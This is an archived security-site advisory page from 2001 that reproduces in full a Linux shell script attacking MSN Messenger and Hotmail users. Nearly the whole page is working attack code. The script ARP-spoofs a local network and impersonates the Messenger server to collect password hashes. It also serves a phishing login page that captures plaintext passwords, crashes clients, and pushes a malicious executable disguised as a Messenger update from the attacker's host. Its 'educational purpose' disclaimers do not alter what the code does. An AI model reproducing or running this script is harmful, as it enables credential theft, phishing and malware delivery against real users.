Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: hmail1~2.htm

Hotmail exploit for Linux



Vulnerability

    Hotmail

Affected

    Hotmail

Description

    Gregory Duchemin found following.   This a little sploit he  wrote
    for  Linux  to   test  a  man   in  the  middle   attack   against
    Messenger/Hotmail.  A kind of swiss army knife that:
    - use the messenger scrambler bug to get passwords hashes
    - spoof  hotmail  site  to  retrieve  plaintext  passwords  (since
      protocol  is  not  enciphered)  when  users  open  their hotmail
      account directly from messenger.
    - remotely crash the client (i did not yet identify where  exactly
      live the bug)
    - upload a malicious program of  your choice as an update.   Since
      it was not  signed by microsoft,  messenger will complain  about
      it but however will ask the user if he wishes to open it anyway.
      Guess what should be a typical user behavior ? ;)

    This script need the useful arptool from Cristiano Lincoln  Mattos
    and  our  favorite  web  server  (for  hotmail  spoofing  and fake
    messenger update).

    #!/bin/sh
    
    #
    #          //
    #         // neaky.sh
    #         \\
    #          \\ wiss army knife for Hotmail/Messenger
    #          //
    #         //
    #
    #
    # "Spoofing/brute force/misconception/unexpected input Class Attack"
    #
    #
    #
    # AUTHOR: Gregory Duchemin ( Aka c3rb3r )
    #
    # COMPANY: NEUROCOM CANADA
    #           1001 bd Maisonneuve Ouest, suite 200
    #           H3A 3C8 Montreal (Quebec) CANADA
    #           gdn@neurocom.com
    #           514 908 6800
    #           http://www.securite-internet.com
    #
    # DATE: January 2001
    #
    # PURPOSE: Will spoof Hotmail/messenger server to recover user
    # hotmail/password, crash messenger client, remotely inject and
    # execute malicious exe on the victim host.
    #
    # NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY
    # to the limited broadcast address/IP Broadcast
    # otherwise u can still try it on your own gateway or from your provider ;)
    # As a last resort, u can temporalily modify your DNS entry for
    # messenger servers.
    #
    # REQUIRED: This sploit needs an "arptool" like software and a local www server to work properly.
    #          =================================================================
    
    
    ##########################################################################################
    #
    # THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY
    #
    ##########################################################################################
    
    
    export delay=100000
    
    ###################################
    # Things to be configured first
    ###################################
    
    # IP address of messenger server to spoof
    # It change from client to client, check it by sniffing or u can always
    # assign as many virtual ip as there are messenger server IP.
    
    export messenger="64.4.13.56"
    
    # HTTP document root
    export cgiroot="/usr/local/apache/cgi-bin/"
    export httproot="/usr/local/apache/htdocs/"
    
    # Malicious exe location
    export malicious_path="/tmp/"
    export malicious="mmssetup.exe"
    
    
    # Access URI : stupid garbage to hide the real url
    export relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother"
    
    # Messenger PORT
    export PORT=1863
    
    # real IP of our fake hotmail server, this host ip
    export MYIP="192.168.10.17"
    
    # number of non read messages,
    # need at least 1 to stimulate requests from the client
    export nrmsg="10"
    
    #number of non read folders
    export nrfld="0"
    
    #path/filename where to store hotmail password
    export PASSWORD_HERE="/tmp/hotmail-pass"
    
    #path to reach your arp spoofer/flooder
    export ARP="arptool"
    
    ##########################################
    # End of configuration options
    ##########################################
    
    
    handl3r()
    {
    echo
    echo "Job finished, hope everything is ok...."
    echo "see ./log for details."
    echo
    html_cleaner
    sync
    killall "$ARP"
    exit
    }
    
    
    usage()
    {
    echo
    echo -e "Usage: $0 [MODE] \n"
    echo
    echo "MODE:   1 /  Hotmail web spoof for clear password recovery."
    echo "        2 /  Hotmail weakenned MD5 password Hash recovery for bruteforce."
    echo "        3 /  Messenger Remote CrAsh."
    echo "        4 /  Remote injection of malicious exe."
    echo
    echo
    
    echo "NOTE: Don't forget to customize settings in the script (the first lines)."
    echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel."
    echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !"
    echo
    echo "DETAILS: attack 1/ will trojanize victim to get back a plain password."
    echo "         attack 2/ will ask for weak md5 hash."
    echo "         attack 3/ will crash the client.(exploitable b.overflow ?)"
    echo "         attack 4/ will upload a fake update, naively installed."
    echo
    echo "have a nice day"
    echo "                   Gregory Duchemin ( c3rb3r@hotmail.com )"
    echo
    echo
    }
    
    if [ $# -lt 1 ]; then
    usage
    exit
    fi
    
    export MODE="$1"
    
    if [ $MODE -gt 4 ]; then
    usage
    exit
    fi
    
    # IP_forwarding should be set to avoid detection/suspicion.
    
    sysctl -w net.ipv4.conf.all.forwarding=1
    
    if [ $? -eq 1 ]; then
    usage
    echo
    echo
    echo "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script."
    echo
    echo
    fi
    
    # automatic configuration of arp broadcasting/spoofing over the Lan.
    echo
    echo -n "ARP broadcast : "
    $ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2  2>&1 > /dev/null &
    
    if [ $? -eq 1 ]; then
    usage
    echo
    echo
    echo "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script."
    echo
    echo
    exit
    fi
    echo "OK"
    export TID=$!
    
    if [ $MODE = "2" ]; then
    echo
    echo "Weak MD5 hashes will be stored in /tmp/md5-password"
    echo
    echo
    fi
    
    if [ $MODE = "1" ]; then
    echo
    echo "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password"
    echo
    echo
    fi
    
    if [ $MODE = "3" ]; then
    echo
    echo "Remote client may suddenly die...."
    echo
    echo
    fi
    
    
    if [ $MODE = "4" ]; then
    if [ ! -f $malicious_path"/$malicious" ]; then
    echo
    echo "Please first define the trojan (in the configuration section)"
    echo
    echo
    exit 0
    fi
    echo
    echo "Remote Injection of junky data."
    echo
    echo
    fi
    
    trap handl3r SIGINT
    
    function html_builder()
    {
    echo -n -e "#!/bin/sh\n
    cat << __MYGIFT__
    Content-type:text/html\n
    <html>
    <!--
    JUST A PROOF OF CONCEPT, USE IT FOR EDUCATIONNAL PURPOSES
    -->
    <body>
    <div align=left>
    <div id=layer1 style=\"width:100%; height:100%; position:absolute; left:0px; top:0px; z-index:0;\">
    <div id=layer2 style=\"position:absolute; left:40; top:0; z-index:0;\">
    <form name=\"passwordform\"  action=\"http://$MYIP/response.html\" method=\"GET\" AUTOCOMPLETE=OFF >
    <table cellpadding=0 cellspacing=0 border=0 width=590>
    <tr>
    <td colspan=2>
    <table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td>
    <a href=\"javascript:void()\" target=_top><img src=\"http://c3rber.multimania.com/horsemail.gif\" width=468 height=60 border=0 alt=""></a>
    </td>
    <td align=CENTER nowrap>
    <img src=\"http://c3rber.multimania.com/pass.gif\" width=140 height=44 border=0 alt=\"Find Out More About Passport\"><br>
    <a href=javascript:void() target=_top><font class=f size=2>Help</font></a><br>
    </td></tr></table>
    </td>
    </tr><tr>
    <td bgcolor=#cccc99><font class=f size=4><b>Please re-enter your password at your own risk</b></font></td>
    <td valign=top><table width=100% border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor=#cccc99></td></tr></table></td>
    </tr>
    <tr><td height=6></td></tr>
    <tr valign=top>
    <td><font class=s>
    </font>
    </td>
    <td rowspan=4><font class=s>
    </font>
    </font>
    </td>
    </tr>
    <tr>
    <td>
    <font class=f size=2><b><" > $cgiroot"/$relogin"
    cat /tmp/.mail >> $cgiroot"/$relogin"
    echo -n -e "></b></font>
    <input type=hidden name=\"domain&IDcookie=123515261725ABFFCDEEE&key-id=&passvalue=&domain-name=\" value=hotmail.com>
    <table cellpadding=0 cellspacing=0>
    <tr>
    <td height=35 valign=middle><font class=sbd>Password</font> </td>
    <td><input type=password name=PASSWORD size=16 maxlength=16></td>
    <td width=22 valign=\"middle\" align=\"center\"> </td>
    <td><input type=\"submit\" name=\"enter\" value=\"Sign in\"></td>
    </tr>
    <tr>
    <td></td>
    <td colspan=\"2\"><font class=\"f\" size=2><b><a href=\"javascript:void()\" target=\"_top\">Change
    User</a></b></font></td>
    </tr>
    </table>
    </form>
    </table>
    <table cellpadding=0 cellspacing=0 border=0 width=590>
    <tr>
    <td> 
    C3rb3r © 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept.
    <a href=\"javascript:void()\">H0rsemail TERMS OF USE and NOTICES</a>  
    <a href=\"javascript:void()\"><font class=\"s\">untrusted Privacy Statement
    </font></a>
    </td>
    </tr>
    </table>
    </div>
    <p align=center>
    <img src=\"http://c3rber.multimania.com/hotmail.jpg\" width=1280 height=950 border=0 >
    </div>
    </div>
    </body>
    </html>
    \n__MYGIFT__\n\n">> $cgiroot"/$relogin"
    
    chmod a+x $cgiroot"/$relogin"
    #echo "This is the false update for messenger."  > $httproot"mmssetup.exe"
    echo "<html><br><br><br><center>Thanx for your participation.</center><br><br>C3rb3r.</html>" > $httproot"response.html"
    }
    
    html_cleaner()
    {
    rm -f $cgiroot"/$relogin"
    mkdir -p $httproot"$relogin"
    chmod a+rwx $httproot"$relogin"
    cp -f $malicious  $httproot"$relogin""/mmssetup.exe"
    rm -f $httproot"response.html"
    }
    
    #IP ALIAS with messenger IP
    echo
    echo -n "Interface configuration : "
    ifconfig eth0:0 inet $messenger
    echo "OK"
    
    
    echo
    echo "Waiting for a client n0w...."
    echo
    
    # things are getting serious now, this is the messenger automate:
    export flag="0"
    cat /dev/null > ./trace
    
    
    while true
    do
    sync
    (
    usleep  $delay
    
    while true
    do
    
    
    export parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)"
    
    if [ "$parsed" != "" ]; then
    sync
    export request=$(echo $parsed | awk '{print $1}')
    export num=$(echo $parsed | awk '{print $2}')
    
    case "$request" in
    
    
    VER)
    usleep $delay
    cat ./log | sed -e "s/VER/ver/" > ./log
    echo -e "VER $num MSNP5 MSNP4 CVR0\r"
    sync
    usleep $delay
    ;;
    
    INF)
    
    cat ./log | sed -e "s/INF/inf/" > ./log
    export new=$(echo $num | sed -e 's/.$/ /')
    echo -e "INF $new""MD5\r"
    usleep $delay
    ;;
    
    USR)
    
    cat ./log | sed -e "s/USR/usr/" > ./log
    export ttype=$(echo $parsed | awk '{print $4}')
    if [ "$ttype" = "I" ]; then
    export email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
    echo "$email" > /tmp/.mail
    html_builder
    rm -f /tmp/.mail
    if [  ! $MODE = "2" ]; then
    echo -e "USR $num MD5 S "$(date "+%s")"\r"
    else
    echo -e "USR $num MD5 S \r"
    fi
    else
    export password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}')
    if [ $MODE = "2" ]; then
    echo -e "910 $num \r"
    usleep $delay
    echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-password
    sync
    exit
    fi
    echo -e "USR $num OK $email $email\r"
    fi
    usleep $delay
    ;;
    
    
    SYN)
    
    export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}')
    cat ./log | sed -e "s/SYN/syn/" > ./log
    export time=$(date "+%s")
    
    echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\
    n: 1.0\r\nContent-Type: text/x-msmsgspro\
    file; charset=UTF-8\r\nLoginTime: $time\
    \r\nEmailEnabled: 1\r\nMemberIdHigh: 84\
    224\r\nMemberIdLow: 1114357868\r\nlang_pre\
    ference: 1033\r\npreferredEmail: \r\ncount\
    ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\
     60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \
    2AAAAAAA\
    AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\
    t3erLcBGzQ$$\r\n\r"
    usleep $delay
    echo -e "SYN $num $syn\r"
    usleep $delay
    sync
    ;;
    
    
    CVR)
    
    export version=$(echo $parsed | awk '{print $8}')
    cat ./log | sed -e "s/CVR/cvr/" > ./log
    
    if [ "$flag" = "0" ]; then
    if [ $MODE = "4" ]; then
    echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
    ttp://$MYIP\
    /$relogin""/$malicious http://$MYIP/$relogin""/$malicious\
    \r"
    else
    echo -e "CVR $num $version $version 1.0.0863 h\
    ttp://$MYIP/\
    /mmssetup.exe http://$MYIP\
    /\r"
    fi
    export flag="1"
    else
    if [ "$flag" = "1" ]; then
    echo -e "$chg"
    echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\
    n: 1.0\r\nContent-Type: text/x-msmsgsini\
    tialemailnotification; charset=UTF-8\r\n\
    \r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\
    \r\nInbox-URL: /$relogin""\r\nFolders\
    -URL: /$relogin""\r\nGet-URL: http\
    //$MYIP\r\n\r"
    if [ $MODE = "4" ]; then
    echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\
    ttp://$MYIP/\
    mmssetup.exe http://$MYIP/\r"
    else
    echo -e "CVR $num $version $version 1.0.0863 h\
    ttp://download.microsoft.com/download/\
    msnmessenger/Patch/2.1/Win98/EN-US/msg\
    strst.dll http://messenger.msn.com/\r"
    fi
    export flag="3"
    echo -e "BPR $num C3rb3r@hotmail.com PHH\r"
    echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\
     c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\
    otmail.com MOB N\r"
    usleep $delay
    if [ $MODE = "3" ]; then
    echo -e  "ADD 0 AL Crash Crash \r"
    usleep $delay
    exit 0
    fi
    fi
    fi
    usleep $delay
    ;;
    
    
    
    CHG)
    
    export chg=$( echo "$parsed"| egrep "CHG")
    cat ./log | sed -e "s/CHG/chg/" > ./log
    usleep $delay
    ;;
    
    OUT)
    html_cleaner
    exit 0
    ;;
    
    URL)
    
    cat ./log | sed -e "s/URL/url/" > ./log
    echo -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\
    \r"
    usleep $delay
    ;;
    
    esac
    fi
    done
    )| nc -w 5 -s $messenger  -n -l -p $PORT > ./log 2>/dev/null
    
    egrep -e 'OUT' ./log > /dev/null
    if [ ! $? -eq 1 ]; then
    echo
    echo "Victim has signed out...."
    echo "see ./log for details."
    echo
    fi
    
    done

Solution

    Nothing to do.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH